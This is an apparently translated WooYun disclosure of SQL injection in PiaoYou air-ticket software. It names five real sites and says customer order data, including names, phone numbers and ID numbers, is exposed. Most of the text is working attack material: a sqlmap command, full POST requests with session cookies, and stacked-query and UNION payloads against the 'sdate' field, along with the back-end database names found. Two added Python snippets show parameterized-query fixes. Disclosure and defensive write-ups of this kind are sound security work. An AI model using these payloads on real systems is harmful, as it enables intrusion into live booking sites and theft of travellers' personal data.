
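Vulnerability summary

Bug ID: wooyun-2015-0120629

Title: Two SQL injections at Haihua Aviation leak a large volume of order information (name, mobile number, ID document number, flight number, departure time, etc.)

Vendor: Beijing Haihua Aviation Service Co., Ltd. (北京海华航空服务有限公司)

Author: missy

Submitted: 2015-06-15 15:25

Fixed: 2015-09-17 17:20

Disclosed: 2015-09-17 17:20

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]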



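Vulnerability details

Disclosure status:

2015-06-15: Details reported to the vendor; waiting for the vendor to respond
2015-06-19: Vendor confirmed; details disclosed to the vendor only
2015-06-22: Details opened to third-party security partners
2015-08-13: Details disclosed to core white hats and experts in related fields
2015-08-23: Details disclosed to regular white hats
2015-09-02: Details disclosed to trainee white hats
2015-09-17: Details disclosed to the public

Brief description:

SQL injection; UNION queries are supported.

Detailed description:

Keyword: "技术支持:盛代科技-票友软件" (Technical support: Shengdai Technology - PiaoYou Software)


http://www.piaoyou.org/case_web.htm is PiaoYou Software's customer case list.


Login is required; registering an account first is enough.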


sqlmap.py -r 1.txt --time-sec=10 -p sdate


Case 1: http://www.h-h.com.cn


POST injection:

POST /Financial/fksq_meb.aspx HTTP/1.1
Host: www.h-h.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.h-h.com.cn/Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=j4mez4nqemur1p5awzc5vw1r; tktcookie=memberid=717&truename=qwueiuqwe&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3728
__VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717




Second location:

POST /Financial/fksq_meb.aspx HTTP/1.1
Host: www.h-h.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.h-h.com.cn/Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=j4mez4nqemur1p5awzc5vw1r; tktcookie=memberid=717&truename=qwueiuqwe&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3728
__VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717




sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&sdate=2015-6-15');WAITFOR DELAY '0:0:5'--&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&sdate=2015-6-15') UNION ALL SELECT NULL,CHAR(113)+CHAR(118)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(119)+CHAR(85)+CHAR(81)+CHAR(114)+CHAR(88)+CHAR(69)+CHAR(65)+CHAR(66)+CHAR(71)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: haihua_pek
[168 tables]


Case 2: http://www.4008836868.com/
POST /Financial/fksq_meb.aspx HTTP/1.1
Host: www.4008836868.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.4008836868.com/Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=4tsndy41ilydo2ck4gem5ewy; tktcookie=memberid=3274&truename=asdaskdj&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3515
__VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=3274




sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&sdate=2015-6-15');WAITFOR DELAY '0:0:10'--&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=3274
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&sdate=2015-6-15') UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(108)+CHAR(78)+CHAR(114)+CHAR(73)+CHAR(78)+CHAR(104)+CHAR(114)+CHAR(118)+CHAR(114)+CHAR(75)+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=3274
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database: 'PiaoYou_james'


Case 3: http://travel.piaoyou.org


POST //Financial/fksq_meb.aspx HTTP/1.1
Host: travel.piaoyou.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://travel.piaoyou.org//Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=gahoq4vgqy1up25s1exqex2m; tktcookie=memberid=36&truename=alksdlk&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3893
__VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=36




sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&sdate=2015-6-15');WAITFOR DELAY '0:0:10'--&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=36
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&sdate=2015-6-15') UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(84)+CHAR(79)+CHAR(88)+CHAR(74)+CHAR(83)+CHAR(113)+CHAR(85)+CHAR(99)+CHAR(105)+CHAR(108)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=36
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current database: 'sdpiaoyou'
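
A server-side check for the `sdate`/`edate` fields that the sqlmap output in the cases above flags, as an added example (not code from the report or from the PiaoYou application): it accepts only values that parse as a calendar date in the `2015-6-15` form the requests use, then passes them to the database as bound parameters. The `pay_requests` table, its columns, the function names and the in-memory SQLite database standing in for SQL Server are assumptions made for illustration.

```python
import re
import sqlite3
from datetime import date
from urllib.parse import parse_qs

# Year-month-day, zero padding optional, as in the "2015-6-15" values in the requests.
_DATE_RE = re.compile(r"\A([0-9]{4})-([0-9]{1,2})-([0-9]{1,2})\Z")

# The only statement text the handler ever sends; user input is bound, never spliced in.
_QUERY = (
    "SELECT id, amount, requested_on FROM pay_requests "
    "WHERE member_id = ? AND requested_on BETWEEN ? AND ? ORDER BY id"
)


class RejectedInput(ValueError):
    """A date field is missing, repeated, or not a plain calendar date."""


def parse_date_field(form, name):
    """Return the field as a datetime.date or raise RejectedInput."""
    values = form.get(name, [])
    if len(values) != 1:
        raise RejectedInput(f"{name}: expected exactly one value")
    match = _DATE_RE.match(values[0])
    if match is None:
        raise RejectedInput(f"{name}: not a date")
    try:
        return date(*(int(part) for part in match.groups()))
    except ValueError:
        # Well-formed digits but no such day, e.g. 2015-2-30.
        raise RejectedInput(f"{name}: no such calendar day") from None


def search_payments(conn, body, session_member_id):
    """Handle the date-range search for the logged-in member.

    session_member_id comes from the server-side session (an assumption of
    this example); the memberid field in the form body is ignored.
    """
    form = parse_qs(body, keep_blank_values=True)
    start = parse_date_field(form, "sdate")
    end = parse_date_field(form, "edate")
    if start > end:
        raise RejectedInput("sdate is after edate")
    params = (session_member_id, start.isoformat(), end.isoformat())
    return conn.execute(_QUERY, params).fetchall()


def make_demo_db():
    """Constructed sample data in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pay_requests (id INTEGER PRIMARY KEY, member_id INTEGER, "
        "amount REAL, requested_on TEXT)"
    )
    conn.executemany(
        "INSERT INTO pay_requests (member_id, amount, requested_on) VALUES (?, ?, ?)",
        [(717, 1200.0, "2015-06-15"), (717, 80.5, "2015-06-20"), (36, 999.0, "2015-06-15")],
    )
    return conn


# Constructed request bodies. The second and third carry the sdate values from
# the sqlmap output above (UNION column list shortened).
BODY_OK = "sdate=2015-6-15&edate=2015-6-15&sh=&kfgp=&skid=0&memberid=717"
BODY_STACKED = "sdate=2015-6-15');WAITFOR DELAY '0:0:5'--&edate=2015-6-15&memberid=717"
BODY_UNION = "sdate=2015-6-15') UNION ALL SELECT NULL,NULL-- &edate=2015-6-15&memberid=717"


def outcome(conn, body, session_member_id=717):
    """Return the rows for an accepted request, or the string 'rejected'."""
    try:
        return search_payments(conn, body, session_member_id)
    except RejectedInput:
        return "rejected"


if __name__ == "__main__":
    db = make_demo_db()
    for label, body in [("ok", BODY_OK), ("stacked", BODY_STACKED), ("union", BODY_UNION)]:
        print(label, outcome(db, body))
```

In the ASP.NET application itself the same pattern is a `SqlCommand` whose date values are supplied as `SqlParameter` objects rather than concatenated into the command text.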


Case 4: http://ryxtrip.com/


POST /Financial/fksq_meb.aspx HTTP/1.1
Host: ryxtrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://ryxtrip.com/Financial/fksq_meb.aspx
Cookie: VERSION=2,0,0,0; BRIDGE_INVITE_0=0; BRIDGE_REFRESH=5000; BRIDGE_CLOCK=1434351705610; BRIDGE_NEED=1; baidu_qiao_v3_count_6031340=1; ASP.NET_SessionId=zbrl5miccffv3gmrupifsgn5; Hm_lvt_da5d85e35ea2fc856fd93df2a2962611=1434351655; Hm_lpvt_da5d85e35ea2fc856fd93df2a2962611=1434351699; tktcookie=memberid=7&truename=dkajsdkj&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin; BRIDGE_R6031340=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3786
__VIEWSTATE=[...]&__EVENTVALIDATION=%2FwEWCgKI3oXRCgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCb8RnfQLgjfBlqC5ElREBfhxqKy8PXOzPeQwVu%2F7scte&sdate=2015%2F6%2F15&edate=2015%2F6%2F15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=7




sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=[...]&__EVENTVALIDATION=/wEWCgKI3oXRCgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCb8RnfQLgjfBlqC5ElREBfhxqKy8PXOzPeQwVu/7scte&sdate=2015/6/15');WAITFOR DELAY '0:0:10'--&edate=2015/6/15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=7
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: __VIEWSTATE=[...]&__EVENTVALIDATION=/wEWCgKI3oXRCgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCb8RnfQLgjfBlqC5ElREBfhxqKy8PXOzPeQwVu/7scte&sdate=2015/6/15') UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(70)+CHAR(68)+CHAR(78)+CHAR(110)+CHAR(77)+CHAR(115)+CHAR(112)+CHAR(90)+CHAR(104)+CHAR(75)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015/6/15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=7
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
current database: 'ryx_sha'


Case 5: http://hhcl.h-h.com.cn/




sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=[...]&__EVENTVALIDATION=/wEWCgL176S6AgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7A

Proof of vulnerability:

Fix:

Filter the input.
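One way to implement the filtering recommended above for the `sdate`, `edate` and `memberid` fields, as an added example that is not part of the original report or the vendor's code. It assumes a hypothetical `payment_requests` table and uses Python's `sqlite3` in place of SQL Server; the real back-end query is not shown on the page.

```python
import re
import sqlite3
from datetime import date

# Accept only the two date shapes seen in the report's requests
# (2015-6-15 and 2015/6/15); any other character fails the match.
_DATE_RE = re.compile(r"(\d{4})([-/])(\d{1,2})\2(\d{1,2})", re.ASCII)


def parse_date_param(raw: str) -> date:
    """Return a date, or raise ValueError for anything that is not a plain date."""
    m = _DATE_RE.fullmatch(raw)
    if m is None:
        raise ValueError("not a date")
    # date() also range-checks month and day (rejects 2015-13-40).
    return date(int(m.group(1)), int(m.group(3)), int(m.group(4)))


def make_demo_db() -> sqlite3.Connection:
    """Constructed sample data; table and column names are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE payment_requests (id INTEGER, member_id INTEGER, created TEXT)"
    )
    conn.executemany(
        "INSERT INTO payment_requests VALUES (?, ?, ?)",
        [(1, 7, "2015-06-15"), (2, 7, "2015-06-20"), (3, 36, "2015-06-15")],
    )
    return conn


def search_payment_requests(conn, sdate: str, edate: str, member_id: str):
    """Validate each field by type, then bind values as parameters, never as SQL text."""
    start, end = parse_date_param(sdate), parse_date_param(edate)
    if not (member_id.isascii() and member_id.isdigit()):
        raise ValueError("member id must be numeric")
    rows = conn.execute(
        "SELECT id FROM payment_requests "
        "WHERE member_id = ? AND created BETWEEN ? AND ? ORDER BY id",
        (int(member_id), start.isoformat(), end.isoformat()),
    )
    return [r[0] for r in rows]
```

In the ASP.NET code the report concerns, the same two steps are strict date parsing followed by `SqlCommand` parameters rather than string concatenation.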

Copyright notice: when reposting, please credit the source missy@WooYun


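Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-06-19 17:19

Vendor reply:

CNVD confirmed and reproduced the issue as described. It has been passed to CNCERT to notify the civil aviation industry evaluation center, which will coordinate follow-up handling with the organization that operates the site.

Latest status:

None yet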


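Vulnerability comments:

Comments

  1. 2015-06-15 15:25 | 疯狗 verified white hat (trainee white hat | Rank: 44, vulnerabilities: 2 | Having read every vulnerability under the sun, the mind is naturally free of code.)

    Air-ticket scams have been making a bit of a comeback lately.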